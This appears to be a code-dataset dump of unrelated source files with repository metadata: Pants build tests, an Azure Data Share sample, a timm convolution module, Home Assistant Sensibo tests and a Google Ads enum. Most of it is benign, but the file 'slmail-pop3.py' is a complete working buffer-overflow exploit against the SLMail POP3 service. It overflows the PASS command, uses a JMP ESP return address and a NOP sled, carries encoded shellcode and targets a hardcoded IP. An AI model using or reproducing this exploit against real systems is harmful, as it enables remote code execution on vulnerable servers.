self.create_file("src/python/foo/resources/js/code.js", "")
self.create_file("src/python/foo/__init__.py", "")
self.assert_sources(
expected_files=["foo/bar/baz/baz1.py", "foo/bar/__init__.py", "foo/__init__.py"],
expected_packages=["foo", "foo.bar", "foo.bar.baz"],
expected_namespace_packages=["foo.bar"],
expected_package_data={},
addrs=["src/python/foo/bar/baz:baz1"],
)
self.assert_sources(
expected_files=["foo/bar/baz/baz2.py", "foo/bar/__init__.py", "foo/__init__.py"],
expected_packages=["foo", "foo.bar", "foo.bar.baz"],
expected_namespace_packages=["foo.bar"],
expected_package_data={},
addrs=["src/python/foo/bar/baz:baz2"],
)
self.assert_sources(
expected_files=["foo/qux/qux.py", "foo/qux/__init__.py", "foo/__init__.py"],
expected_packages=["foo", "foo.qux"],
expected_namespace_packages=[],
expected_package_data={},
addrs=["src/python/foo/qux"],
)
self.assert_sources(
expected_files=[
"foo/bar/baz/baz1.py",
"foo/bar/__init__.py",
"foo/qux/qux.py",
"foo/qux/__init__.py",
"foo/__init__.py",
"foo/resources/js/code.js",
],
expected_packages=["foo", "foo.bar", "foo.bar.baz", "foo.qux"],
expected_namespace_packages=["foo.bar"],
expected_package_data={"foo": ("resources/js/code.js",)},
addrs=["src/python/foo/bar/baz:baz1", "src/python/foo/qux", "src/python/foo/resources"],
)
self.assert_sources(
expected_files=[
"foo/bar/baz/baz1.py",
"foo/bar/baz/baz2.py",
"foo/bar/__init__.py",
"foo/qux/qux.py",
"foo/qux/__init__.py",
"foo/__init__.py",
"foo/resources/js/code.js",
],
expected_packages=["foo", "foo.bar", "foo.bar.baz", "foo.qux"],
expected_namespace_packages=["foo.bar"],
expected_package_data={"foo": ("resources/js/code.js",)},
addrs=[
"src/python/foo/bar/baz:baz1",
"src/python/foo/bar/baz:baz2",
"src/python/foo/qux",
"src/python/foo/resources",
],
)
class TestGetRequirements(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_requirements,
get_owned_dependencies,
get_exporting_owner,
RootRule(DependencyOwner),
]
def assert_requirements(self, expected_req_strs, addr):
reqs = self.request_single_product(
ExportedTargetRequirements,
Params(DependencyOwner(ExportedTarget(self.tgt(addr))), create_options_bootstrapper()),
)
assert sorted(expected_req_strs) == list(reqs)
def test_get_requirements(self) -> None:
self.create_file(
"3rdparty/BUILD",
textwrap.dedent(
"""
python_requirement_library(
name='ext1',
requirements=[python_requirement('ext1==1.22.333')],
)
python_requirement_library(
name='ext2',
requirements=[python_requirement('ext2==4.5.6')],
)
python_requirement_library(
name='ext3',
requirements=[python_requirement('ext3==0.0.1')],
)
"""
),
)
self.create_file(
"src/python/foo/bar/baz/BUILD",
"python_library(dependencies=['3rdparty:ext1'], sources=[])",
)
self.create_file(
"src/python/foo/bar/qux/BUILD",
"python_library(dependencies=['3rdparty:ext2', 'src/python/foo/bar/baz'], sources=[])",
)
self.create_file(
"src/python/foo/bar/BUILD",
textwrap.dedent(
"""
python_library(
sources=[],
dependencies=['src/python/foo/bar/baz', 'src/python/foo/bar/qux'],
provides=setup_py(name='bar', version='9.8.7'),
)
"""
),
)
self.create_file(
"src/python/foo/corge/BUILD",
textwrap.dedent(
"""
python_library(
sources=[],
dependencies=['3rdparty:ext3', 'src/python/foo/bar'],
provides=setup_py(name='corge', version='2.2.2'),
)
"""
),
)
self.assert_requirements(["ext1==1.22.333", "ext2==4.5.6"], "src/python/foo/bar")
self.assert_requirements(["ext3==0.0.1", "bar==9.8.7"], "src/python/foo/corge")
class TestGetAncestorInitPy(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_ancestor_init_py,
RootRule(Targets),
RootRule(SourceRootConfig),
*determine_source_files_rules(),
]
def assert_ancestor_init_py(
self, expected_init_pys: Iterable[str], addrs: Iterable[str]
) -> None:
ancestor_init_py_files = self.request_single_product(
AncestorInitPyFiles,
Params(
Targets([self.tgt(addr) for addr in addrs]), SourceRootConfig.global_instance(),
),
)
snapshots = [
self.request_single_product(Snapshot, Params(digest))
for digest in ancestor_init_py_files.digests
]
init_py_files_found = set([file for snapshot in snapshots for file in snapshot.files])
# NB: Doesn't include the root __init__.py or the missing src/python/foo/bar/__init__.py.
assert sorted(expected_init_pys) == sorted(init_py_files_found)
def test_get_ancestor_init_py(self) -> None:
init_source_root()
# NB: src/python/foo/bar/baz/qux/__init__.py is a target's source.
self.create_file("src/python/foo/bar/baz/qux/BUILD", "python_library()")
self.create_file("src/python/foo/bar/baz/qux/qux.py", "")
self.create_file("src/python/foo/bar/baz/qux/__init__.py", "")
self.create_file("src/python/foo/bar/baz/__init__.py", "")
# NB: No src/python/foo/bar/__init__.py.
# NB: src/python/foo/corge/__init__.py is not any target's source.
self.create_file("src/python/foo/corge/BUILD", 'python_library(sources=["corge.py"])')
self.create_file("src/python/foo/corge/corge.py", "")
self.create_file("src/python/foo/corge/__init__.py", "")
self.create_file("src/python/foo/__init__.py", "")
self.create_file("src/python/__init__.py", "")
self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["style.css"])')
self.create_file("src/python/foo/resources/style.css", "")
# NB: A stray __init__.py in a resources-only dir.
self.create_file("src/python/foo/resources/__init__.py", "")
# NB: None of these should include the root src/python/__init__.py, the missing
# src/python/foo/bar/__init__.py, or the stray src/python/foo/resources/__init__.py.
self.assert_ancestor_init_py(
["foo/bar/baz/qux/__init__.py", "foo/bar/baz/__init__.py", "foo/__init__.py"],
["src/python/foo/bar/baz/qux"],
)
self.assert_ancestor_init_py([], ["src/python/foo/resources"])
self.assert_ancestor_init_py(
["foo/corge/__init__.py", "foo/__init__.py"],
["src/python/foo/corge", "src/python/foo/resources"],
)
self.assert_ancestor_init_py(
[
"foo/bar/baz/qux/__init__.py",
"foo/bar/baz/__init__.py",
"foo/corge/__init__.py",
"foo/__init__.py",
],
["src/python/foo/bar/baz/qux", "src/python/foo/corge"],
)
class TestGetOwnedDependencies(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_owned_dependencies,
get_exporting_owner,
RootRule(DependencyOwner),
]
def assert_owned(self, owned: Iterable[str], exported: str):
assert sorted(owned) == sorted(
od.target.address.reference()
for od in self.request_single_product(
OwnedDependencies,
Params(
DependencyOwner(ExportedTarget(self.tgt(exported))),
create_options_bootstrapper(),
),
)
)
def test_owned_dependencies(self) -> None:
self.create_file(
"src/python/foo/bar/baz/BUILD",
textwrap.dedent(
"""
python_library(name='baz1', sources=[])
python_library(name='baz2', sources=[])
"""
),
)
self.create_file(
"src/python/foo/bar/BUILD",
textwrap.dedent(
"""
python_library(
name='bar1',
sources=[],
dependencies=['src/python/foo/bar/baz:baz1'],
provides=setup_py(name='bar1', version='1.1.1'),
)
python_library(
name='bar2',
sources=[],
dependencies=[':bar-resources', 'src/python/foo/bar/baz:baz2'],
)
resources(name='bar-resources', sources=[])
"""
),
)
self.create_file(
"src/python/foo/BUILD",
textwrap.dedent(
"""
python_library(
name='foo',
sources=[],
dependencies=['src/python/foo/bar:bar1', 'src/python/foo/bar:bar2'],
provides=setup_py(name='foo', version='3.4.5'),
)
"""
),
)
self.assert_owned(
["src/python/foo/bar:bar1", "src/python/foo/bar/baz:baz1"], "src/python/foo/bar:bar1"
)
self.assert_owned(
[
"src/python/foo",
"src/python/foo/bar:bar2",
"src/python/foo/bar:bar-resources",
"src/python/foo/bar/baz:baz2",
],
"src/python/foo",
)
class TestGetExportingOwner(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_exporting_owner,
RootRule(OwnedDependency),
]
def assert_is_owner(self, owner: str, owned: str):
assert (
owner
== self.request_single_product(
ExportedTarget,
Params(OwnedDependency(self.tgt(owned)), create_options_bootstrapper()),
).target.address.reference()
)
def assert_error(self, owned: str, exc_cls: Type[Exception]):
with pytest.raises(ExecutionError) as excinfo:
self.request_single_product(
ExportedTarget,
Params(OwnedDependency(self.tgt(owned)), create_options_bootstrapper()),
)
ex = excinfo.value
assert len(ex.wrapped_exceptions) == 1
assert type(ex.wrapped_exceptions[0]) == exc_cls
def assert_no_owner(self, owned: str):
self.assert_error(owned, NoOwnerError)
def assert_ambiguous_owner(self, owned: str):
self.assert_error(owned, AmbiguousOwnerError)
def test_get_owner_simple(self) -> None:
self.create_file(
"src/python/foo/bar/baz/BUILD",
textwrap.dedent(
"""
python_library(name='baz1', sources=[])
python_library(name='baz2', sources=[])
"""
),
)
self.create_file(
"src/python/foo/bar/BUILD",
textwrap.dedent(
"""
python_library(
name='bar1',
sources=[],
dependencies=['src/python/foo/bar/baz:baz1'],
provides=setup_py(name='bar1', version='1.1.1'),
)
python_library(
name='bar2',
sources=[],
dependencies=[':bar-resources', 'src/python/foo/bar/baz:baz2'],
)
resources(name='bar-resources', sources=[])
"""
),
)
self.create_file(
"src/python/foo/BUILD",
textwrap.dedent(
"""
python_library(
name='foo1',
sources=[],
dependencies=['src/python/foo/bar/baz:baz2'],
provides=setup_py(name='foo1', version='0.1.2'),
)
python_library(name='foo2', sources=[])
python_library(
name='foo3',
sources=[],
dependencies=['src/python/foo/bar:bar2'],
provides=setup_py(name='foo3', version='3.4.5'),
)
"""
),
)
self.assert_is_owner("src/python/foo/bar:bar1", "src/python/foo/bar:bar1")
self.assert_is_owner("src/python/foo/bar:bar1", "src/python/foo/bar/baz:baz1")
self.assert_is_owner("src/python/foo:foo1", "src/python/foo:foo1")
self.assert_is_owner("src/python/foo:foo3", "src/python/foo:foo3")
self.assert_is_owner("src/python/foo:foo3", "src/python/foo/bar:bar2")
self.assert_is_owner("src/python/foo:foo3", "src/python/foo/bar:bar-resources")
self.assert_no_owner("src/python/foo:foo2")
self.assert_ambiguous_owner("src/python/foo/bar/baz:baz2")
def test_get_owner_siblings(self) -> None:
self.create_file(
"src/python/siblings/BUILD",
textwrap.dedent(
"""
python_library(name='sibling1', sources=[])
python_library(
name='sibling2',
sources=[],
dependencies=['src/python/siblings:sibling1'],
provides=setup_py(name='siblings', version='2.2.2'),
)
"""
),
)
self.assert_is_owner("src/python/siblings:sibling2", "src/python/siblings:sibling1")
self.assert_is_owner("src/python/siblings:sibling2", "src/python/siblings:sibling2")
def test_get_owner_not_an_ancestor(self) -> None:
self.create_file(
"src/python/notanancestor/aaa/BUILD",
textwrap.dedent(
"""
python_library(name='aaa', sources=[])
"""
),
)
self.create_file(
"src/python/notanancestor/bbb/BUILD",
textwrap.dedent(
"""
python_library(
name='bbb',
sources=[],
dependencies=['src/python/notanancestor/aaa'],
provides=setup_py(name='bbb', version='11.22.33'),
)
"""
),
)
self.assert_no_owner("src/python/notanancestor/aaa")
self.assert_is_owner("src/python/notanancestor/bbb", "src/python/notanancestor/bbb")
def test_get_owner_multiple_ancestor_generations(self) -> None:
self.create_file(
"src/python/aaa/bbb/ccc/BUILD",
textwrap.dedent(
"""
python_library(name='ccc', sources=[])
"""
),
)
self.create_file(
"src/python/aaa/bbb/BUILD",
textwrap.dedent(
"""
python_library(
name='bbb',
sources=[],
dependencies=['src/python/aaa/bbb/ccc'],
provides=setup_py(name='bbb', version='1.1.1'),
)
"""
),
)
self.create_file(
"src/python/aaa/BUILD",
textwrap.dedent(
"""
python_library(
name='aaa',
sources=[],
dependencies=['src/python/aaa/bbb/ccc'],
provides=setup_py(name='aaa', version='2.2.2'),
)
"""
),
)
self.assert_is_owner("src/python/aaa/bbb", "src/python/aaa/bbb/ccc")
self.assert_is_owner("src/python/aaa/bbb", "src/python/aaa/bbb")
self.assert_is_owner("src/python/aaa", "src/python/aaa")
def test_validate_args() -> None:
with pytest.raises(InvalidSetupPyArgs):
validate_args(("bdist_wheel", "upload"))
with pytest.raises(InvalidSetupPyArgs):
validate_args(("sdist", "-d", "new_distdir/"))
with pytest.raises(InvalidSetupPyArgs):
validate_args(("--dist-dir", "new_distdir/", "sdist"))
validate_args(("sdist",))
validate_args(("bdist_wheel", "--foo"))
| [
"[email protected]"
] | |
3144ecf342e1c38eb5c4bcf21135c183e9157eee | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/datashare/azure-mgmt-datashare/generated_samples/provider_share_subscriptions_adjust.py | 496c049f7baa29e25e02b0ee6f7ed8ffa89deaa0 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,824 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datashare import DataShareManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datashare
# USAGE
python provider_share_subscriptions_adjust.py
    Before running the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = DataShareManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-12345678abc",
)
response = client.provider_share_subscriptions.adjust(
resource_group_name="SampleResourceGroup",
account_name="Account1",
share_name="Share1",
provider_share_subscription_id="4256e2cf-0f82-4865-961b-12f83333f487",
provider_share_subscription={"properties": {"expirationDate": "2020-12-26T22:33:24.5785265Z"}},
)
print(response)
# x-ms-original-file: specification/datashare/resource-manager/Microsoft.DataShare/stable/2020-09-01/examples/ProviderShareSubscriptions_Adjust.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
13319f9028ad09f1d990efba329a3d5162550bb6 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/image_classification/CSPResNeXt-50_ID1888_for_PyTorch/timm/models/layers/separable_conv.py | 340f58362031b648a0361ac28d85bde369834876 | [
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MIT",
"CC-BY-NC-4.0",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 4,530 | py | #
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
""" Depthwise Separable Conv Modules
Basic DWS convs. Other variations of DWS exist with batch norm or activations between the
DW and PW convs such as the Depthwise modules in MobileNetV2 / EfficientNet and Xception.
Hacked together by / Copyright 2020 Ross Wightman
"""
from torch import nn as nn
from .create_conv2d import create_conv2d
from .create_norm_act import convert_norm_act
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
class SeparableConvBnAct(nn.Module):
""" Separable Conv w/ trailing Norm and Activation
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU,
apply_act=True, drop_block=None):
super(SeparableConvBnAct, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
norm_act_layer = convert_norm_act(norm_layer, act_layer)
self.bn = norm_act_layer(out_channels, apply_act=apply_act, drop_block=drop_block)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
if self.bn is not None:
x = self.bn(x)
return x
class SeparableConv2d(nn.Module):
""" Separable Conv
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1):
super(SeparableConv2d, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
return x
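# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original timm module): push a dummy
# NCHW tensor through a 3x3 depthwise-separable conv. The channel and spatial
# sizes are arbitrary placeholders.
if __name__ == '__main__':
    _sep = SeparableConv2d(in_channels=16, out_channels=32, kernel_size=3)
    _dummy = torch.randn(2, 16, 56, 56)  # (batch, channels, height, width)
    _out = _sep(_dummy)
    # with the default 'same'-style padding this is expected to be [2, 32, 56, 56]
    print(_out.shape)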
| [
"[email protected]"
] | |
3459276818ce07479d8a250a648e51b33e116764 | c9ca065c2674ca30c12a90ceab88ac5798646473 | /weather/weather.py | 0911597edd9300a64cc9034898c72555e919512b | [] | no_license | mshazman/data_munging | beaa389ad3de48d52f1f2ef03ed4ba7f04c77698 | f4f815a896f8f7a6957ebbb22369dd760e95072e | refs/heads/master | 2020-07-23T17:03:01.970331 | 2019-09-10T19:07:20 | 2019-09-10T19:07:20 | 207,640,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | """This Module have class to perform all calculation realted to weather"""
import calculation
class WeatherCalculation(calculation.Computation):
"""class object takes data in form of dictionary and apply functions on it"""
def __init__(self, weather_data):
self.weather_data = weather_data
def min_spread_day(self):
"""Function Return day on with temp diffrence is minimum"""
min_value = self.compute_min_value(self.weather_data)
min_value_key = self.compute_min_value_key(min_value, self.weather_data)
return min_value, min_value_key
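# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). It assumes the
# external ``calculation.Computation`` base class provides ``compute_min_value``
# and ``compute_min_value_key`` over a day -> temperature-spread mapping; the
# sample data below is made up.
if __name__ == "__main__":
    sample_spreads = {"1": 9, "2": 5, "3": 12}
    weather = WeatherCalculation(sample_spreads)
    spread, day = weather.min_spread_day()
    print("Minimum temperature spread {0} on day {1}".format(spread, day))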
| [
"="
] | = |
dbce7481439b0de5401a7b81de4c4d300404aa6b | 6388104b646b304a081985216ad2f82f09db2af3 | /slmail-pop3.py | 67f374a5ffac594a45f6cfba7a7c22230d03e945 | [] | no_license | war4uthor/CVE-2003-0264 | 73bd207d3f989434be942982d344285633f6fc48 | 82352386a3e740db37f84ebbaed2632965c4c0a8 | refs/heads/master | 2020-04-12T12:41:00.763220 | 2018-12-19T22:50:30 | 2018-12-19T22:50:30 | 162,499,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,955 | py | #!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 5F4A358F FFE4 JMP ESP
shellcode = (
"\xb8\x9a\x26\x16\x98\xd9\xcd\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x0e\x03\xd8\x28\xf4\x6d\x20\xdc\x7a"
"\x8d\xd8\x1d\x1b\x07\x3d\x2c\x1b\x73\x36\x1f\xab\xf7\x1a\xac"
"\x40\x55\x8e\x27\x24\x72\xa1\x80\x83\xa4\x8c\x11\xbf\x95\x8f"
"\x91\xc2\xc9\x6f\xab\x0c\x1c\x6e\xec\x71\xed\x22\xa5\xfe\x40"
"\xd2\xc2\x4b\x59\x59\x98\x5a\xd9\xbe\x69\x5c\xc8\x11\xe1\x07"
"\xca\x90\x26\x3c\x43\x8a\x2b\x79\x1d\x21\x9f\xf5\x9c\xe3\xd1"
"\xf6\x33\xca\xdd\x04\x4d\x0b\xd9\xf6\x38\x65\x19\x8a\x3a\xb2"
"\x63\x50\xce\x20\xc3\x13\x68\x8c\xf5\xf0\xef\x47\xf9\xbd\x64"
"\x0f\x1e\x43\xa8\x24\x1a\xc8\x4f\xea\xaa\x8a\x6b\x2e\xf6\x49"
"\x15\x77\x52\x3f\x2a\x67\x3d\xe0\x8e\xec\xd0\xf5\xa2\xaf\xbc"
"\x3a\x8f\x4f\x3d\x55\x98\x3c\x0f\xfa\x32\xaa\x23\x73\x9d\x2d"
"\x43\xae\x59\xa1\xba\x51\x9a\xe8\x78\x05\xca\x82\xa9\x26\x81"
"\x52\x55\xf3\x06\x02\xf9\xac\xe6\xf2\xb9\x1c\x8f\x18\x36\x42"
"\xaf\x23\x9c\xeb\x5a\xde\x77\x1e\x90\xe0\xd7\x76\xa4\xe0\xd6"
"\x3d\x21\x06\xb2\x51\x64\x91\x2b\xcb\x2d\x69\xcd\x14\xf8\x14"
"\xcd\x9f\x0f\xe9\x80\x57\x65\xf9\x75\x98\x30\xa3\xd0\xa7\xee"
"\xcb\xbf\x3a\x75\x0b\xc9\x26\x22\x5c\x9e\x99\x3b\x08\x32\x83"
"\x95\x2e\xcf\x55\xdd\xea\x14\xa6\xe0\xf3\xd9\x92\xc6\xe3\x27"
"\x1a\x43\x57\xf8\x4d\x1d\x01\xbe\x27\xef\xfb\x68\x9b\xb9\x6b"
"\xec\xd7\x79\xed\xf1\x3d\x0c\x11\x43\xe8\x49\x2e\x6c\x7c\x5e"
"\x57\x90\x1c\xa1\x82\x10\x3c\x40\x06\x6d\xd5\xdd\xc3\xcc\xb8"
"\xdd\x3e\x12\xc5\x5d\xca\xeb\x32\x7d\xbf\xee\x7f\x39\x2c\x83"
"\x10\xac\x52\x30\x10\xe5")
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C"*(3500-2606-4-351-16)
try:
print "\nSending evil buffer..."
s.connect(('10.11.25.84', 110))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to POP3!"
| [
"[email protected]"
] | |
dcfd08920d5d8dc25f09f1674d7a69c10ecedbb1 | 1bed2f766620acf085ed2d7fd3e354a3482b8960 | /tests/components/sensibo/test_entity.py | 818d9ddb92499f60c743ebd9a3a8e50177e03817 | [
"Apache-2.0"
] | permissive | elupus/home-assistant | 5cbb79a2f25a2938a69f3988534486c269b77643 | 564150169bfc69efdfeda25a99d803441f3a4b10 | refs/heads/dev | 2023-08-28T16:36:04.304864 | 2022-09-16T06:35:12 | 2022-09-16T06:35:12 | 114,460,522 | 2 | 2 | Apache-2.0 | 2023-02-22T06:14:54 | 2017-12-16T12:50:55 | Python | UTF-8 | Python | false | false | 2,826 | py | """The test for the sensibo entity."""
from __future__ import annotations
from unittest.mock import patch
from pysensibo.model import SensiboData
import pytest
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
)
from homeassistant.components.sensibo.const import SENSIBO_ERRORS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import device_registry as dr, entity_registry as er
async def test_entity(
hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
"""Test the Sensibo climate."""
state1 = hass.states.get("climate.hallway")
assert state1
dr_reg = dr.async_get(hass)
dr_entries = dr.async_entries_for_config_entry(dr_reg, load_int.entry_id)
dr_entry: dr.DeviceEntry
for dr_entry in dr_entries:
if dr_entry.name == "Hallway":
assert dr_entry.identifiers == {("sensibo", "ABC999111")}
device_id = dr_entry.id
er_reg = er.async_get(hass)
er_entries = er.async_entries_for_device(
er_reg, device_id, include_disabled_entities=True
)
er_entry: er.RegistryEntry
for er_entry in er_entries:
if er_entry.name == "Hallway":
assert er_entry.unique_id == "Hallway"
@pytest.mark.parametrize("p_error", SENSIBO_ERRORS)
async def test_entity_failed_service_calls(
hass: HomeAssistant,
p_error: Exception,
load_int: ConfigEntry,
get_data: SensiboData,
) -> None:
"""Test the Sensibo send command with error."""
state = hass.states.get("climate.hallway")
assert state
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
side_effect=p_error,
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
| [
"[email protected]"
] | |
444fd3d4ecdaaf0e9ceab752d1b0931729f02bbe | 245b92f4140f30e26313bfb3b2e47ed1871a5b83 | /airflow/providers/google_vendor/googleads/v12/errors/types/campaign_feed_error.py | 7a1cbbf42dce80b65a8b1c81159737e23be143fb | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | ephraimbuddy/airflow | 238d6170a0e4f76456f00423124a260527960710 | 3193857376bc2c8cd2eb133017be1e8cbcaa8405 | refs/heads/main | 2023-05-29T05:37:44.992278 | 2023-05-13T19:49:43 | 2023-05-13T19:49:43 | 245,751,695 | 2 | 1 | Apache-2.0 | 2021-05-20T08:10:14 | 2020-03-08T04:28:27 | null | UTF-8 | Python | false | false | 1,509 | py | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="airflow.providers.google_vendor.googleads.v12.errors",
marshal="google.ads.googleads.v12",
manifest={"CampaignFeedErrorEnum",},
)
class CampaignFeedErrorEnum(proto.Message):
r"""Container for enum describing possible campaign feed errors.
"""
class CampaignFeedError(proto.Enum):
r"""Enum describing possible campaign feed errors."""
UNSPECIFIED = 0
UNKNOWN = 1
FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE = 2
CANNOT_CREATE_FOR_REMOVED_FEED = 4
CANNOT_CREATE_ALREADY_EXISTING_CAMPAIGN_FEED = 5
CANNOT_MODIFY_REMOVED_CAMPAIGN_FEED = 6
INVALID_PLACEHOLDER_TYPE = 7
MISSING_FEEDMAPPING_FOR_PLACEHOLDER_TYPE = 8
NO_EXISTING_LOCATION_CUSTOMER_FEED = 9
LEGACY_FEED_TYPE_READ_ONLY = 10
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"[email protected]"
] | |
18d4a948b0ca382c4d01997d274c1deb0cbccddf | b92226895d04b0258981864e8604720de9c09f4d | /src/utils.py | 3200a377f749da6ea1b234e191737060009fa795 | [
"BSD-3-Clause"
